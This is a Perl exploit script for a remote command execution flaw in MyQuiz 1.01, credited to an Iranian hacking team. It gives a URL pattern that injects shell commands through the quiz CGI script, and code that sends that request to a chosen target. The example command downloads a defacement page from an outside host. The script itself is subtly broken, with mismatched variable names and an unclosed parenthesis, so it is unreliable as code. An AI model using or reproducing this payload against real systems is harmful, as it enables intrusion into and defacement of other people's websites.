This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.
Athour : Hessam-x - www.hessamx.net
+IHST : iran hackerz security team (hackerz.ir)

#((Perl exploit))

#!/usr/bin/perl

=> MyQuiz Remote Command Execution Exploit

-> By Hessam-x / www.hackerz.ir

manual exploiting –> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|

Iran Hackerz Security Team

Hessam-x : www.hessamx.net

use LWP::Simple;

print "Target(www.example.com)\$ ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/)\$ \n";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request, wait for some seconds/minutes…\n";
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"
print "[+] Exploiting request done!\n";
print "Enjoy !";